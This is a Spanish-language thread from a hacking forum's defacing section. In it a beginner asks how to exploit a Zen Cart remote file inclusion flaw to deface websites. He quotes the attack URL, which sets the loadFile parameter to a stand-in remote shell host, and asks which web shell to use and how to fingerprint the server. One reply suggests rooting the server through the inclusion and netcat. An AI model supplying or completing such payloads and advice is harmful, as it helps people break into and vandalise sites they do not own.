Nuevas NORMAS para el foro

Curso Hacker
Bienvenido(a), Visitante. Favor de ingresar o registrarse.
¿Perdiste tu email de activación? - Agosto 21, 2008, 06:42:59
Boton Buscar
Inicio Ayuda Ingresar Registrarse
Visita: Articulos - Juegos Gratis - Da Foros

Comunidad Underground Hispana  |  Phreaking, Hacking y Seguridad  |  HacK GeneraL  |  Defacing  |  Tema: Zen Cart Multiple File Include Vulnerabilities 0 Usuarios y 1 Visitante están viendo este tema. « anterior próximo »
Páginas: [1] Ir Abajo Imprimir
Autor Tema: Zen Cart Multiple File Include Vulnerabilities  (Leído 307 veces)
XspectroX
Miembro
*****
Desconectado Desconectado

Mensajes: 63



Ver Perfil Email
« en: Diciembre 31, 2006, 11:47:01 »
wenas, que tal? he estado tratando de aprender hacerca del defacing, en un scan con SSS me consegui con este bug, "Zen Cart Multiple File Include Vulnerabilities" el cual me llveva a esto...

1._ "http://www.securityfocus.com/bid/19543"
2._ "/data/vulnerabilities/exploits/zencart-rfi.txt "

y por ultimo aqui... lo que importa
3._http://www.example.com/index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://shell

ok, asi se llega al supuesto bug (imagino   Undecided)... ok, donde dice www.example.com va la pag del atack, cierto?
y aqui va la http://shell...

ahora, que shell debo usar? debo compilarla? esto son cosas que no tengo muy claro... tengo sistema oprativo winXP y es algo que me limita mucho aprender porque he visto muchos videos pero trabajan con linux... cambiar de sistema operativo es una opcion pero iniciar de cero no parece buena opcion... estoy tratando de iniciarme con liux a ver como me va, pero ahorita quiero aprender con XP... espero su respuesta, gracias....


PD: estoy en busca de un tutor para amedida que este aprendiendo preguntar por privado y no postear quizas cosas insignificantes... gracias...


[/url]
En línea
Tuareg
Miembro
*****
Desconectado Desconectado

Mensajes: 106


Ver Perfil Email
« Respuesta #1 en: Diciembre 31, 2006, 06:05:59 »
En línea

100% colombiano
XspectroX
Miembro
*****
Desconectado Desconectado

Mensajes: 63



Ver Perfil Email
« Respuesta #2 en: Enero 01, 2007, 05:52:40 »
primero que nada, gracias, Tuareg...  ok, estoy ya algo mas claro ya se por lo menos con que me conseguire al entrar (me preguntaba eso)... ahora, como se yo si el servidor es bsd o linux...? (como dije, soy noob...  Lips Sealed)

no se si esta es una manera de saberlo, pero es este por casualidad? o hay una manera especifica de saberlo?
En línea
XspectroX
Miembro
*****
Desconectado Desconectado

Mensajes: 63



Ver Perfil Email
« Respuesta #3 en: Enero 01, 2007, 06:41:47 »
En línea
Tuareg
Miembro
*****
Desconectado Desconectado

Mensajes: 106


Ver Perfil Email
« Respuesta #4 en: Enero 01, 2007, 11:54:26 »
En línea

100% colombiano
Canaima
Miembro
*****
Desconectado Desconectado

Mensajes: 47


Ver Perfil Email
« Respuesta #5 en: Enero 02, 2007, 07:43:41 »
lo que podrias hacer es rootear el server aciendo un rfi y utilizando el netcat, aunq y te digo q yo las veces q e utilizado el sss y me a salido un rfi no me a funcionado
En línea
Páginas: [1] Ir Arriba Imprimir 
Comunidad Underground Hispana  |  Phreaking, Hacking y Seguridad  |  HacK GeneraL  |  Defacing  |  Tema: Zen Cart Multiple File Include Vulnerabilities « anterior próximo »
Ir a:  


Ranking-Hits
Powered by SMF 1.1.5 | SMF © 2006-2007, Simple Machines LLC